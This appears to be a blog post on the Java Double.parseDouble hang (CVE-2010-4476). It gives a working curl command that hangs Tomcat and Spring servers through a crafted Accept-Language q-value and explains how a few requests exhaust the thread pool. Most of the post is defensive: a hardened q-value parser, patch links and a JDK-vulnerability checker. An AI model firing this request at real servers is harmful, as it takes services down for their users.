Java DoS 2.2250738585072012e-308 with curl

There seems to be an easy way to trigger the Java Double.parseDouble hang (CVE-2010-4476) that is going around in the news:

curl -H "Accept-Language: en-us;q=2.2250738585072012e-308" URL

(Use plain ASCII double quotes; the request never returns on an affected server, so give curl a --max-time if you do not want it to sit there.)

Apparently this works against any Tomcat server whose application calls getLocale() on the request (Tomcat parses the q-value of the Accept-Language header with Double.parseDouble) and against most Spring applications. Each such request pins one worker thread at 100% CPU in an endless loop, so a handful of requests is enough to exhaust the connector's thread pool.
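If you cannot patch the JDK right away, the server-side mitigation is to never hand raw header text to Double.parseDouble. The following added example (not code from the original post or from Tomcat/Spring) shows the naive q-value conversion next to a hardened variant that checks the RFC 2616 qvalue grammar first, so only short decimals between 0 and 1 ever reach the JDK parser; the sample header values are constructed:

```java
import java.util.regex.Pattern;

public class QValueParsing {

    // Vulnerable pattern: arbitrary header text goes straight to Double.parseDouble.
    // On an unpatched JDK this call never returns for the CVE-2010-4476 value.
    static double parseQValueUnsafe(String q) {
        return Double.parseDouble(q);
    }

    // RFC 2616 qvalue grammar: ( "0" [ "." 0*3DIGIT ] ) | ( "1" [ "." 0*3("0") ] )
    private static final Pattern QVALUE =
            Pattern.compile("0(\\.[0-9]{0,3})?|1(\\.0{0,3})?");

    // Hardened: anything outside the grammar is rejected before parsing,
    // so exponents, signs and long digit strings never reach the JDK parser.
    static double parseQValueSafe(String q) {
        String s = q.trim();
        if (!QVALUE.matcher(s).matches()) {
            throw new IllegalArgumentException("invalid qvalue: " + q);
        }
        return Double.parseDouble(s);
    }

    // Extracts the q parameter from one Accept-Language element such as
    // "en-us;q=0.8". A missing q means 1.0 per the RFC.
    static double qualityOf(String element) {
        for (String part : element.split(";")) {
            String p = part.trim();
            if (p.regionMatches(true, 0, "q=", 0, 2)) {
                return parseQValueSafe(p.substring(2));
            }
        }
        return 1.0;
    }

    public static void main(String[] args) {
        // Constructed header elements: two normal ones and the hostile one from the curl command.
        String[] samples = {"en-us;q=0.8", "de", "en-us;q=2.2250738585072012e-308"};
        for (String s : samples) {
            try {
                System.out.println(s + " -> q=" + qualityOf(s));
            } catch (IllegalArgumentException e) {
                System.out.println(s + " -> rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Whether you reject the whole request or just drop the offending language element is a policy choice; the important part is that the regex runs before parseDouble, not after. The same check belongs in front of any other place where a client-controlled string is converted to a double (query parameters, JSON numbers, form fields).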

In the meantime Oracle has released a Java patch for the problem (JDK 6 Update 24; the security alert below also offers the FPUpdater tool for older releases). Update your boxes!

Release Notes: http://blogs.oracle.com/henrik/2011/02/jdk_6_update_24_released.html
Security Alert: http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html

On my servers it had no effect, but maybe you had success? Please leave a comment.

Edit:

You should all have received a Java security update by now. If you want to check whether a JVM is still affected, you can use the following code to reproduce the bug locally.

$ cat Runhang.java 
class Runhang {
  public static void main(String[] args) {
    System.out.println("Test:");
    // The value is kept as a string on purpose: written as a double literal,
    // the same number also hangs javac on an affected JDK.
    double d = Double.parseDouble("2.2250738585072012e-308");
    System.out.println("Value: " + d);
  }
}

$ javac Runhang.java
$ java Runhang &
... on a patched JDK this prints "Value: 2.2250738585072014E-308" right away; on an affected JDK the "Value:" line never appears and the process spins at 100% CPU. Wait and kill it :)
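If you want to run this check from a script (for instance across a fleet of boxes) you do not want a process that has to be killed by hand. The following added example (not part of the original post) does the same parse on a daemon thread and reports the result by exit code; the 5 second timeout is an assumption and can be raised on slow machines:

```java
public class ParseDoubleCheck {

    static final String HOSTILE = "2.2250738585072012e-308";

    // Returns true if Double.parseDouble(literal) finished within timeoutMillis
    // (patched JDK), false if the parser is still spinning (unpatched JDK).
    static boolean parsesWithin(final String literal, long timeoutMillis)
            throws InterruptedException {
        final double[] result = new double[1];
        Thread worker = new Thread(new Runnable() {
            public void run() {
                result[0] = Double.parseDouble(literal);
            }
        });
        // A daemon thread does not keep the JVM alive if it never returns.
        worker.setDaemon(true);
        worker.start();
        worker.join(timeoutMillis);
        return !worker.isAlive();
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println("java.version=" + System.getProperty("java.version"));
        // Control value first, so a broken checker is not mistaken for a fixed JDK.
        if (!parsesWithin("1.5", 2000)) {
            System.out.println("checker broken: control value did not parse");
            System.exit(2);
        }
        if (parsesWithin(HOSTILE, 5000)) {
            System.out.println("not affected: " + HOSTILE + " parsed normally");
            System.exit(0);
        }
        System.out.println("AFFECTED: Double.parseDouble(" + HOSTILE
                + ") still running after 5 s, patch this JDK");
        // Explicit exit discards the spinning daemon thread.
        System.exit(1);
    }
}
```

Exit code 0 means the JDK is fixed, 1 means it still hangs, 2 means the check itself is broken. Run it with the exact java binary your application server uses, since a box can easily carry a patched and an unpatched JDK side by side.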